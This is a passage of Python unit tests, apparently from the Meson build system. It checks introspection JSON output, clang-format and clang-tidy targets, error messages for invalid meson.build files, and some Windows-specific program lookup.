'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '72 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
prog = 'trivialprog'
if is_windows():
prog = '{}.exe'.format(prog)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# If compile worked then we should get a program
self.assertPathExists(os.path.join(self.builddir, prog))
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, prog))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '74 dep files')
# Regression test: Spurious reconfigure was happening when build
# directory is inside source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During first configure the file did not exist so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
# During the reconfigure the file did exist, but is inside build
# directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '213 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '44 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '232 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
